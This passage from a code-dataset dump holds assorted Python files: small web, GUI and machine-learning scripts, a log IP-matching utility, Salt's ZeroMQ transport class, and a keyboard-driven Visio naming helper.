jinja_environment.get_template(\"index.html\")\n self.response.write(template.render({}))\n\napp = webapp2.WSGIApplication([ (\"/\", HomePageHandler),\n (YOAFTERANHOUR_CALLBACK, OneHourHandler),\n (YOAFTER30MIN_CALLBACK, ThirtyMinuteHandler),\n (YOAFTER15MIN_CALLBACK, FifteenMinuteHandler),\n (\"/yo\", YoHandler) ], debug=True)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"146253951","text":"import math\n\nclass DummySensor:\n def __init__(self):\n self.vel = 0\n self.pos = 0\n self.current = 0\n self.voltage = 0\n self.x = 0\n\n def read_dummy(self):\n self.incr_dummy_data()\n self.x += 0.01\n return (self.vel, self.pos, self.current, self.voltage)\n\n def incr_dummy_data(self):\n self.current = self._incr_gaus(self.x)\n self.vel = self._incr_sigmoid(self.x)\n self.pos = self._incr_log(self.x)\n self.voltage = self._incr_const(self.x)\n\n @staticmethod\n def _incr_gaus(x):\n return (\n 3*math.exp(\n -math.pow((x-8), 2) / 12\n )\n )\n\n @staticmethod\n def _incr_sigmoid(x):\n return (\n 2 / (\n 1 + math.exp(-(x-5))\n )\n )\n\n @staticmethod\n def _incr_log(x):\n return math.log(x+1, 10)\n\n @staticmethod\n def _incr_const(x):\n return 2\n\ndef run():\n import matplotlib.pyplot as plt\n dum_boy = DummySensor()\n x_coords = []\n vels = []\n poss = []\n currents = []\n voltages = []\n for x in range(0, 1000):\n x_coords.append(x)\n vel, pos, current, voltage = dum_boy.read_dummy()\n vels.append(vel)\n poss.append(pos)\n currents.append(current)\n voltages.append(voltage)\n plt.plot(x_coords, poss, label=\"Position\")\n plt.plot(x_coords, vels, label=\"Velocity\")\n plt.plot(x_coords, currents, label=\"Currents\")\n plt.plot(x_coords, voltages, label=\"Voltages\")\n plt.title(label=\"Test Sensor\")\n plt.legend(loc=\"best\")\n plt.show()\n\nif __name__ == '__main__':\n run()\n","sub_path":"lib/testing/dummy_sensor.py","file_name":"dummy_sensor.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464622573","text":"'''\n'''\n\nfrom ambry.bundle import BuildBundle\n \n\nclass Bundle(BuildBundle):\n ''' '''\n \n def __init__(self,directory=None):\n self.super_ = super(Bundle, self)\n self.super_.__init__(directory)\n\n\n def get_srs(self):\n import ogr\n places = self.library.dep('places').partition\n row = places.query(\"SELECT spsrs FROM places where code = ?\",'SndSAN').fetchone()\n \n srs = ogr.osr.SpatialReference()\n srs.ImportFromEPSG(int(row['spsrs']))\n \n return srs\n\n def build(self):\n '''Build HDF files that contain the rasterized blocks'''\n import ogr\n from ambry.geo.analysisarea import AnalysisArea\n from osgeo.gdalconst import GDT_Float32\n from ambry.geo.sfschema import TableShapefile\n import numpy as np\n # average meters per degree at latitude 32, computed from m/d lat\n # and m/d lon. \n mpd = (110886.79 + 94493.11) / 2\n dpm = (1.0/mpd)\n \n blocks_p = self.partitions.find_or_new_hdf(table='blocks')\n \n contour = dpm * 40 # Space buffer contours at 20m\n \n contour = 10\n \n ca_blocks= self.library.dep('blocks_ca').partition\n blocks_srs = ca_blocks.get_srs()\n sp_srs = self.get_srs()\n\n lr = self.init_log_rate(500)\n\n #tracts = self.partitions.find_or_new_geo(table='tracts')\n #tracts.clean()\n\n edp = lambda x: self.filesystem.path('extracts',x+'.tiff')\n\n \n for block in ca_blocks.query(\n \"\"\"SELECT geoid as name, countyfp, AsText(geometry) \n AS geometry FROM blocks\n WHERE countyfp = 73 \n \"\"\"):\n\n block = dict(block)\n\n g = ogr.CreateGeometryFromWkt(block['geometry'])\n g.AssignSpatialReference(blocks_srs)\n \n g.TransformTo(sp_srs) \n \n gs = [g]\n \n if g.Area() > 100000:\n \n in_g = g.Clone()\n out_g = g.Clone()\n \n for i in range(5):\n \n out_g = out_g.Buffer(contour)\n\n gs = [out_g] + gs \n \n if in_g.Area() > 8000:\n in_g = in_g.Buffer(-contour)\n gs = gs + [in_g]\n \n \n else:\n out_g = g.Clone()\n \n aa = AnalysisArea.new_from_geometry(out_g)\n aa.scale = 10\n\n #print '---', len(gs), out_g.Area()\n #print aa\n\n layer = aa.get_rasterlayer(data_type=GDT_Float32)\n \n #for i,g in enumerate(gs):\n # layer.add_geometry(g, (i+1)*10 )\n \n layer.add_geometry(g, i )\n \n a = layer.rasterize()\n \n a = a / np.sum(a) # Normalize to 1\n \n \n blocks_p.database.put_geo('blocks/'+block['name'], a, aa)\n\n lr()\n\n \n def rasterize(self):\n from ambry.geo.analysisarea import AnalysisArea\n from ambry.geo.kernel import ArrayKernel\n from ambry.datasets.geo import US\n from osgeo.gdalconst import GDT_Float32\n \n places = self.library.dep('places').partition\n place = US(self.library).place('SndSAN')\n \n blocks_p = self.partitions.find_or_new_hdf(table='blocks')\n \n san_aa = place.aa(scale=10)\n san_aa_a = san_aa.new_array()\n\n geofile= self.library.dep('geofile').partition\n \n lr = self.init_log_rate(1000)\n \n aa_in = 0\n aa_out = 0\n \n for i,block in enumerate(geofile.query(\"\"\"\n SELECT * FROM blocks WHERE placens = 2411782\n \"\"\")):\n\n if block['pop100'] == 0:\n continue\n\n block = dict(block)\n\n try:\n b,aa = blocks_p.database.get_geo('blocks/{}'.format(block['geoid']))\n except KeyError:\n #self.error(block['geoid'])\n continue\n \n \n lr(\"{} / {} \".format(aa_in, aa_out))\n\n density = float(block['pop100']) \n\n # Convert the raster for the block into a kernel se we can use\n # the kernel code to apply it to the raster. \n k = ArrayKernel(b, density)\n \n (x,y) = san_aa.translate_to_array(*aa.upper_left)\n \n #x += ( k.center - (k.oshape[1]/2) )\n #y += ( k.center - (k.oshape[0]/2) )\n\n # A few of the records wont fit in the area after adding k.center\n try: k.apply_add(san_aa_a, x, y)\n except: pass\n lr()\n \n edp = lambda x: self.filesystem.path('extracts',x+'.tiff')\n \n \n san_aa.write_geotiff(edp('test'), san_aa_a, data_type=GDT_Float32) ","sub_path":"bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"441287780","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n item_num = len(preorder)\n if item_num == 0:\n return None\n elif item_num == 1:\n return TreeNode(preorder[0])\n else:\n root_value = preorder[0]\n root = TreeNode(root_value)\n inorder_root_index = inorder.index(root_value)\n root.left = self.buildTree(preorder[1:1 + inorder_root_index], inorder[:inorder_root_index])\n root.right = self.buildTree(preorder[1 + inorder_root_index:], inorder[1 + inorder_root_index:])\n return root","sub_path":"Week_03/105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486262894","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\ndef paint_fill(screen, row, column, new_color):\r\n def fill(r, c):\r\n if r < 0 or r >= len(screen) or c < 0 or c >= len(screen[0]):\r\n return\r\n if screen[r][c] != old_color:\r\n return\r\n screen[r][c] = new_color\r\n fill(r - 1, c) # up\r\n fill(r, c - 1) # left\r\n fill(r + 1, c) # down\r\n fill(r, c + 1) # right\r\n\r\n old_color = screen[row][column]\r\n if old_color == new_color:\r\n return\r\n fill(row, column)\r\n\r\n\r\nif __name__ == '__main__':\r\n screen = [\r\n [5, 5, 5, 5, 5, 7, 5, 5],\r\n [5, 5, 5, 7, 7, 7, 7, 5],\r\n [5, 7, 5, 7, 7, 5, 5, 5],\r\n [5, 5, 7, 7, 7, 5, 5, 5],\r\n [5, 5, 5, 5, 7, 7, 7, 5],\r\n ]\r\n\r\n for row in screen:\r\n print(row)\r\n print()\r\n\r\n print('Filling at point (2, 3) with color 0\\n')\r\n paint_fill(screen, 2, 3, 0)\r\n\r\n for row in screen:\r\n print(row)\r\n print()\r\n","sub_path":"ctci/python/ch8_recursion_and_dynamic_programming/q10_paint_fill.py","file_name":"q10_paint_fill.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470760613","text":"from tkinter import *\r\nfrom datetime import datetime as dt\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"655x333\")\r\n\r\nroot.config(background = \"black\")\r\n\r\n\r\ndef getvals():\r\n print(\"Submitting form...;\")\r\n print(f\"{usernamevalue.get(), phonevalue.get(), emailvalue.get()}\")\r\n\r\n with open(\"records1.txt\", \"a\") as f:\r\n f.write(f\"{usernamevalue.get(), phonevalue.get(), emailvalue.get()}\\n\")\r\n\r\nLabel(root, text = \"Inlongs\", bg = \"black\", fg = \"yellow\", font = \"comicsans 16 bold\", pady = 15, padx = 75, relief = RAISED).pack()\r\nLabel(root, text = \"Get the fastest news on here....\", font = \"bold\", bg = \"black\", fg = \"white\").pack()\r\nLabel(root,text=f\"Date : {dt.now().date()}\",font=\"lucida 15 bold\", fg = \"white\", bg =\"black\").pack()\r\n\r\n\r\nf1 = Frame(root, borderwidth = 6, bg = \"grey\", relief = SUNKEN, width = 1400 )\r\n\r\nl = Label(f1, text = \"India reports 49,310 new cases\\nTotal cases stand at 12,87,945 including 4,40,135 active cases.\\nIndia also reported 740 new deaths, taking the toll to 30,601.\\nTotal number of cured/discharged/migrated stand at 8,17,209.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nf1 = Frame(root, borderwidth = 6, bg = \"grey\", relief = SUNKEN)\r\n\r\nl = Label(f1, text = \"Women's tennis cancels all China events in 2020 over coronavirus.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nf1 = Frame(root, borderwidth = 6, bg = \"grey\", relief = SUNKEN)\r\n\r\nl = Label(f1, text = \"Rajasthan HC Live updates: Can the Speaker disqualify Sachin Pilot? Verdict soon\\nThe 19 dissident MLAs had filed a petition in the high court, challenging the disqualification notices.\\nGehlot said those who went to court are the ones who were wrong and had been misguided.\", font = \"Helvetica 16 bold\", fg = \"black\", pady = 20)\r\nl.pack()\r\n\r\nf1.pack(anchor = \"n\")\r\n\r\nframe1 = Frame(root)\r\n\r\nusername = Label(frame1, text = \"Username \", bg = \"grey\")\r\nusername.pack(side = LEFT)\r\nusernamevalue = StringVar()\r\nusernameentry = Entry(frame1, textvariable = usernamevalue)\r\nusernameentry.pack(side = LEFT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nphone = Label(frame1, text = \"Phone No.\", bg = \"grey\")\r\nphone.pack(side = LEFT)\r\nphonevalue = StringVar()\r\nphoneentry = Entry(frame1, textvariable = phonevalue)\r\nphoneentry.pack(side = RIGHT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nemail = Label(frame1, text = \"Email-ID \", bg = \"grey\")\r\nemail.pack(side = LEFT)\r\nemailvalue= StringVar()\r\nemailentry = Entry(frame1, textvariable = emailvalue)\r\nemailentry.pack(side = LEFT)\r\n\r\nframe1.pack()\r\n\r\nframe1 = Frame(root)\r\n\r\nButton(frame1, text = \"Submit..\", command = getvals).pack()\r\n\r\nframe1.pack()\r\n\r\nroot.mainloop()","sub_path":"News.py","file_name":"News.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148811013","text":"# -*- coding=utf-8 -*-\n#从两个日志文件找相同出现的IP\n\nimport re \nregex = re.compile(r'\\d{2,3}\\.\\d{2,3}\\.\\d{2,3}\\.\\d{2,3}')\n\nf1 = input('Please select the first files:')\nf2 = input('Please select the second files:')\n\ndef find_same_ip(file_1,file_2):\n\n\tpre_fn_1 = []\n\tnew_fn_1 = [] \n\tpre_fn_2 = []\n\tnew_fn_2 = []\n\tthe_same_ip = []\n\t#读取一个日志文件的每行到列表里\n\t#如果一行中有多个ip,会出现[[,,,],[,,,],...]\n\t#遍历上面的嵌套列表,将嵌套列表的元素添加到列表最后\n\twith open(file_1) as f1:\n\t\tfn_1 = f1.readlines() \n\t\tfor i in range(0,len(fn_1)): \n\t\t\tfn_1[i] = fn_1[i].strip('\\n') \n\t\t\tfn_1[i] = regex.findall(fn_1[i]) \n\t\t\tif len(fn_1[i]) >1: \n\t\t\t\tfor h in fn_1[i]: \n\t\t\t\t\tfn_1.append(h)\n\t#将列表中非嵌套的元素添加一个新的列表中\n\tfor i in fn_1:\n\t\tif type(i) != type([]):\n\t\t\tpre_fn_1.append(i)\n\t#新表元素去重\n\tfor i in pre_fn_1:\n\t\tif i not in new_fn_1:\n\t\t\tnew_fn_1.append(i)\n\n\twith open(file_2) as f2: \n\t\tfn_2 = f2.readlines() \n\t\tfor i in range(0,len(fn_2)): \n\t\t\tfn_2[i] = fn_2[i].strip('\\n') \n\t\t\tfn_2[i] = regex.findall(fn_2[i]) \n\t\t\tif len(fn_2[i]) >1: \n\t\t\t\tfor h in fn_2[i]: \n\t\t\t\t\tfn_2.append(h) \n\tfor i in fn_2:\n\t\tif type(i) != type([]):\n\t\t\tpre_fn_2.append(i)\n\n\tfor i in pre_fn_2:\n\t\tif i not in new_fn_2:\n\t\t\tnew_fn_2.append(i) \n\t#判断两个列表元素的交集\n\tfor i in new_fn_1:\n\t\tif i in new_fn_2:\n\t\t\tthe_same_ip.append(i)\t\t\n\t#这里不能用f1,f2,显示异常\n\tprint('%s 和 %s 两个文件中相同的IP有\\n' % (file_1,file_2))\n\t\n\tfor i in the_same_ip:\n\t\tprint(i)\n\n\nfind_same_ip(f1,f2)","sub_path":"自编码文件/从两个日志文件行中找相同IP.py","file_name":"从两个日志文件行中找相同IP.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66512449","text":"import pandas as pd \r\nimport tensorflow as tf\r\nfrom tensorflow import feature_column\r\nfrom tensorflow.keras import layers\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\n\r\n\r\ndataframe = pd.read_csv(\"feats/combined.csv\", encoding = \"utf-8\")\r\n\r\ntrain, test = train_test_split(dataframe, test_size = .2)\r\ntrain, val = train_test_split(train, test_size=.2)\r\nprint(len(train), 'train examples')\r\nprint(len(val), 'validation examples')\r\nprint(len(test), 'test examples')\r\n\r\n\r\n\r\ndef df_to_dataset(dataframe, shuffle=False, batch_size=32):\r\n\tdataframe = dataframe.copy()\r\n\tlabels = dataframe.pop('target')\r\n\tds = tf.data.Dataset.from_tensor_slices((dict(dataframe), labels))\r\n\tif shuffle:\r\n\t\tds = ds.shuffle(buffer_size=len(dataframe))\r\n\tds = ds.batch(batch_size)\r\n\treturn ds\r\n\r\ntrain_ds = df_to_dataset(train, shuffle = True)\r\nval_ds = df_to_dataset(val)\r\ntest_ds = df_to_dataset(test)\r\n\r\nheaders = []\r\n\r\nfor feature_batch, label_batch in train_ds.take(1):\r\n\theaders = list(feature_batch.keys())\r\n\r\n\tprint('A batch of targets:', label_batch )\r\n\r\n\r\nf_cols = []\r\n\r\nfor header in headers:\r\n\tf_cols.append(feature_column.numeric_column(header))\r\n\r\nfeat_layer = tf.keras.layers.DenseFeatures(f_cols)\r\n\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n feat_layer,\r\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\r\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\r\n tf.keras.layers.Dropout(0.2),\r\n tf.keras.layers.Dense(10, activation=tf.nn.softmax)\r\n])\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(train_ds, epochs=10)\r\nmodel.evaluate(test_ds)\r\n\r\n","sub_path":"ostest.py","file_name":"ostest.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59037447","text":"# -*- coding: utf-8 -*-\n'''\nEncapsulate the different transports available to Salt. Currently this is only ZeroMQ.\n'''\n\nimport salt.payload\nimport salt.auth\n\n\nclass Channel(object):\n\n @staticmethod\n def factory(opts, **kwargs):\n\n # Default to ZeroMQ for now\n ttype = 'zeromq'\n\n if 'transport_type' in opts:\n ttype = opts['transport_type']\n elif 'transport_type' in opts.get('pillar', {}).get('master', {}):\n ttype = opts['pillar']['master']['transport_type']\n\n if ttype == 'zeromq':\n return ZeroMQChannel(opts, **kwargs)\n else:\n raise Exception(\"Channels are only defined for ZeroMQ\")\n # return NewKindOfChannel(opts, **kwargs)\n\n\nclass ZeroMQChannel(Channel):\n\n '''\n Encapsulate sending routines to ZeroMQ.\n\n ZMQ Channels default to 'crypt=aes'\n '''\n\n def __init__(self, opts, **kwargs):\n self.opts = opts\n\n # crypt defaults to 'aes'\n self.crypt = kwargs['crypt'] if 'crypt' in kwargs else 'aes'\n\n self.serial = salt.payload.Serial(opts)\n if self.crypt != 'clear':\n self.auth = salt.crypt.SAuth(opts)\n if 'master_uri' in kwargs:\n master_uri = kwargs['master_uri']\n else:\n master_uri = opts['master_uri']\n\n self.sreq = salt.payload.SREQ(master_uri)\n\n def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):\n ret = self.sreq.send('aes', self.auth.crypticle.dumps(load), tries, timeout)\n key = self.auth.get_keys()\n aes = key.private_decrypt(ret['key'], 4)\n pcrypt = salt.crypt.Crypticle(self.opts, aes)\n return pcrypt.loads(ret[dictkey])\n\n def _crypted_transfer(self, load, tries=3, timeout=60):\n '''\n In case of authentication errors, try to renegotiate authentication\n and retry the method.\n Indeed, we can fail too early in case of a master restart during a\n minion state execution call\n '''\n def _do_transfer():\n return self.auth.crypticle.loads(\n self.sreq.send(self.crypt,\n self.auth.crypticle.dumps(load),\n tries,\n timeout)\n )\n try:\n return _do_transfer()\n except salt.crypt.AuthenticationError:\n self.auth = salt.crypt.SAuth(self.opts)\n return _do_transfer()\n\n def _uncrypted_transfer(self, load, tries=3, timeout=60):\n return self.sreq.send(self.crypt, load, tries, timeout)\n\n def send(self, load, tries=3, timeout=60):\n\n if self.crypt != 'clear':\n return self._crypted_transfer(load, tries, timeout)\n else:\n return self._uncrypted_transfer(load, tries, timeout)\n # Do we ever do non-crypted transfers?\n","sub_path":"sources/salt/transport/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636444863","text":"import torch\nimport torch.nn as nn\nimport time\nfrom torchvision import transforms\n\nfrom lib.headpose import module_init, head_pose_estimation\nfrom mtcnn.mtcnn import MTCNN\n\nfrom detectron2.config import get_cfg\n\nfrom utils.add_config import *\n\nclass MTCNN(object):\n def __init__(self, cfg, instance_mode=ColorMode.IMAGE):\n \"\"\"\n Args:\n cfg (CfgNode):\n instance_mode (ColorMode):\n \"\"\"\n self.cpu_device = torch.device(\"cpu\")\n self.instance_mode = instance_mode\n\n self.head_pose_module = module_init(cfg)\n self.mtcnn = MTCNN()\n self.transformations = transforms.Compose([transforms.Resize(224), \\\n transforms.CenterCrop(224), transforms.ToTensor(), \\\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n self.softmax = nn.Softmax(dim=1).cuda()\n\n idx_tensor = [idx for idx in range(66)]\n self.idx_tensor = torch.FloatTensor(idx_tensor).cuda()\n\n def run_on_image(self, image):\n \"\"\"\n Args:\n image (np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n \"\"\"\n predictions, bounding_box, face_keypoints, w, face_area = head_pose_estimation(frame, self.mtcnn, self.head_pose_module, self.transformations, self.softmax, self.idx_tensor)\n\n return predictions, bounding_box\n\ndef setup_mtcnn(cfg_keypoint, confidence_threshold, weights):\n \"\"\"\n ATTENTION: Must be called before mtcnn()\n \"\"\"\n # load config from file and command-line arguments\n cfg = get_cfg()\n add_config(cfg)\n cfg.merge_from_file(cfg_keypoint)\n\n # Set score_threshold for builtin models\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.WEIGHTS = weights\n\n cfg.freeze()\n\n demo = MTCNN(cfg_object)\n\n setup_logger(name=\"MTCNN\")\n logger = setup_logger()\n\n return cfg, demo\n\ndef mtcnn(image, cfg, demo, confidence_threshold, weights, logger):\n \"\"\"\n Args:\n image (np.ndarray): an image of shape (H, W, C) (in BGR order).\n This is the format used by OpenCV.\n cfg (path): path to the default Keypoint RCNN config file provided by detectron2\n demo (MTCNN object): instance of the MTCNN class\n confidence_threshold (float): the confidence threshold of the network\n weights (path): path to the object detection weigths\n logger (logger):\n \"\"\"\n start_time = time.time()\n predictions, bounding_box = demo.run_on_image(image)\n logger.info(\n \"{}: detected {} instances in {:.2f}s\".format(\n path, len(predictions[\"instances\"]), time.time() - start_time\n )\n )\n\n return predictions, bounding_box\n","sub_path":"mtcnn.py","file_name":"mtcnn.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398353934","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom data_loader.data_loader import DataLoader\nfrom tensorflow.keras.models import load_model\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\n\n\n#GLOBAL VARIABLES\ndata_path = \"..//test_data//temp_predict.csv\"\nmodel_path = \"..//h5 models//run17.h5\"\nwindow=45\nthreshold=0.035\n\ndef load_data(data_path):\n df = pd.read_csv(data_path,low_memory=False,skip_blank_lines=True)\n df = df.drop(['DATE'],axis=1)\n return df\n\ndef process_data(df):\n prices = df['IQ_LASTSALEPRICE'].values.reshape(-1, 1)\n bmark = df['BENCHMARK'].values.reshape(-1, 1)\n\n len = prices.shape[0]\n priceReturns = np.empty((len, 1))\n bmarkReturns = np.empty((len, 1))\n for i in range (0,len-window):\n priceReturns[i] = prices[i+window,0]/prices[i,0]-1\n bmarkReturns[i] = bmark[i+window, 0]/bmark[i, 0] - 1\n\n priceReturns=priceReturns[:-window]\n bmarkReturns=bmarkReturns[:-window]\n relReturns = priceReturns - bmarkReturns\n targets = []\n for ret in relReturns:\n if ret > threshold:targets.append(1)\n elif ret < -threshold:targets.append(-1)\n else: targets.append(0)\n targets = np.array(targets).reshape(-1, 1)\n unique, counts = np.unique(targets, return_counts=True)\n print(\"Target counts are %s %s\", unique, counts)\n\n ohe = OneHotEncoder(categories='auto')\n targets_ohe = ohe.fit_transform(targets).toarray()\n\n print(\"prices:\\n\", prices)\n print(\"priceReturns:\\n\", priceReturns)\n print(\"bmarkReturns:\\n\", bmarkReturns)\n print(\"relReturns:\\n\", relReturns)\n print(\"targets:\\n\", targets)\n print(\"targets_ohe:\\n\", targets_ohe)\n\n return targets_ohe\n\ndef normalize_data(df):\n sc = StandardScaler()\n sc.fit(df.values)\n x_pred = sc.transform(df.values)\n return x_pred\n\n\ndef predict_results(model_path):\n dense_model =load_model(model_path)\n pred_results = dense_model.predict(x_pred)\n np.savetxt(\"..//test_data//prediction_results.csv\",pred_results,delimiter=\",\")\n print(\"pred:\\n\", pred_results)\n return pred_results\n\nif __name__ == '__main__':\n df = load_data(data_path)\n # targets_ohe = process_data(df)\n x_pred = normalize_data(df)\n print(x_pred)\n pred_results = predict_results(model_path)\n\n\n\n","sub_path":"predictor/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217552334","text":"import keyboard, openpyxl, pyautogui, tkinter, time, sys, os, datetime\r\nfrom tkinter import filedialog, messagebox, Tk\r\nfrom openpyxl import Workbook, load_workbook\r\nfrom guizero import App, Text, TextBox, PushButton, Window\r\n\r\n\r\n\r\nglobal siteName\r\nglobal apPrefix\r\nglobal apNumber\r\nglobal apName\r\nglobal excelCount\r\nglobal excelNumber\r\nglobal rowLetter\r\nglobal rowNumber\r\nglobal rowWholeName\r\nglobal list\r\nglobal excelName\r\nglobal formatNumber\r\nglobal excelStartingInteger\r\nglobal keyPress\r\n\r\nsiteName = str ('Paul')\r\napPrefix = siteName + '-XX-'\r\napNumber = int('1')\r\napName = str(apPrefix) + str(apNumber)\r\nexcelCount = int('1')\r\nexcelNumber = int('1')\r\nrowLetter = 'A'\r\nrowNumber = int('1')\r\n\r\nrowWholeName = str(rowLetter) + str(rowNumber)\r\nlist=[99999]\r\nexcelName = 'Paul'\r\nformatNumber = format(apNumber, '05')\r\nexcelStartingInteger = int('1')\r\ncurrentTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H.%M.%S\")\r\n\r\n\r\ndef startWorkbook ():#Starts an excel. Required for visioTool.\r\n global wb\r\n wb = Workbook()\r\n global ws\r\n ws = wb.active\r\n\r\ndef openFiles():#Opens file explorer\r\n global excelName\r\n #Tk().withdraw() # We don't want a full GUI, so keep the root window from appearing\r\n excelName = filedialog.askopenfilename() # Show an \"Open\" dialog box and return the path to the selected file\r\n print(excelName)\r\n print('')\r\n\r\ndef pause(): #Pause logic\r\n keyPress = keyboard.read_key()\r\n if keyPress == 'pause': #Reads if pause button has been pressed and unpauses\r\n print('Unpaused')\r\n time.sleep(.3)\r\n exit\r\n else: #If pause has not been pressed then loop repeats infinitely WOO\r\n pause()\r\n \r\ndef theGUI(): #all the GUI stuff\r\n print('')\r\n print('Start of Visio Tool')\r\n def apStartingNumber(): # part of GUI that allows changing of the starting AP number\r\n global apNumber\r\n global formatNumber\r\n apNumber = int(startingNumber.value)\r\n formatNumber = format(apNumber, '05')\r\n print ('AP number changed to ' + str(apNumber))\r\n changingText.value = \"AP number changed to \" + str(apNumber) #Text for changing AP number\r\n\r\n def changeSiteName(): # part of GUI that allows changing of the site name\r\n global siteName\r\n global apPrefix\r\n global apName\r\n siteName = str(siteNames.value)\r\n apPrefix = siteName + '-XX-'\r\n apName = str(apPrefix) + str(apNumber)\r\n print('Site name changed to ' + siteName)\r\n changingText.value = \"Site changed to \" + siteName #Text for changing site name\r\n \r\n def directions(): #Once \"Go?\" has been pressed execute the following items\r\n startWorkbook()\r\n openFiles()\r\n app.hide()\r\n visioLoop()\r\n python = sys.executable #Restarts the whole program\r\n os.execl(python, python, * sys.argv) #Restarts the whole program\r\n \r\n app = App(title = \"Phoenix_Oath\", width=352, height=132, layout='grid')\r\n\r\n button7 = PushButton(app, text = \"Go?\", command = directions, grid=[2,3])\r\n\r\n #Logic for changing starting AP number\r\n startingNumberText = Text(app, text=\"AP Number?\", align=\"left\", grid=[0,1]) #Text asks for AP number\r\n startingNumber = TextBox(app, align=\"right\",text = \"1\", width=30, grid=[1,1]) #Text box for data entry\r\n button4 = PushButton(app, text = \"Confirm\", command = apStartingNumber, grid=[2,1])\r\n\r\n #Logic for changing site name\r\n siteNamesText = Text(app, text=\"Site Name?\", align=\"left\", grid=[0,2]) #Text asks for site name\r\n siteNames = TextBox(app, align=\"right\",text = \"PAUL\", width=30, grid=[1,2]) #Text box for data entry\r\n button6 = PushButton(app, text = \"Confirm\", command = changeSiteName, grid=[2,2])\r\n\r\n changingText = Text(app,text=\"War has changed\", align =\"left\", grid=[1,3])\r\n app.display() # initiates the GUI. Allowing it to be used\r\n \r\ndef saveExcel(): # saves Visio Tool names to Excel\r\n global displayText\r\n global excelName\r\n wb.save(excelName) # Saves workbook\r\n print ('')\r\n print ('Worksheet saved')\r\n print ('End of Visio Tool')\r\n \r\ndef visioGuts(): # the internals to the Visio Tool. Determines how most of the program is run\r\n global apNumber\r\n global formatNumber\r\n global excelStartingInteger\r\n print (apName)\r\n ws.cell(excelStartingInteger, 1, apName) #writes in excel **format** ->(row, column, content to be written in cell)\r\n pyautogui.press('backspace'); pyautogui.typewrite(str(formatNumber)) # takes control of keyboard. hits backspace and types AP number\r\n apNumber += 1 #increments ap number up by 1\r\n excelStartingInteger += 1 # Increments Excel cell to be written in\r\n formatNumber = format(apNumber, '05') # Modifies apNumber by adding up to 5 zeros in front\r\n\r\ndef visioLoop():\r\n global apNumber\r\n global formatNumber\r\n global excelStartingInteger\r\n global apName\r\n while True:\r\n keyPress = keyboard.read_key() #reads ALL keypress's and saves to variable\r\n \r\n if keyPress == '`' : #Adds a Default Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber)\r\n visioGuts ()\r\n \r\n elif keyPress == 's': #Adds a Standup Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'S'\r\n visioGuts ()\r\n \r\n elif keyPress == 'g' : #Adds a Guard Shack Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'G'\r\n visioGuts ()\r\n \r\n elif keyPress == 'm' : #Adds a MOD/KIVA Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'M'\r\n visioGuts ()\r\n \r\n elif keyPress == 'h' : #Adds a High Racking Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'H'\r\n visioGuts ()\r\n \r\n elif keyPress == 'd' : #Adds a Door Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'D'\r\n visioGuts ()\r\n\r\n elif keyPress == 'e' : #Adds a External Ap to cutsheet\r\n apName = str(apPrefix) + str(formatNumber) + 'E'\r\n visioGuts ()\r\n \r\n elif keyPress == '[': #goes down one ap number.\r\n apNumber -= 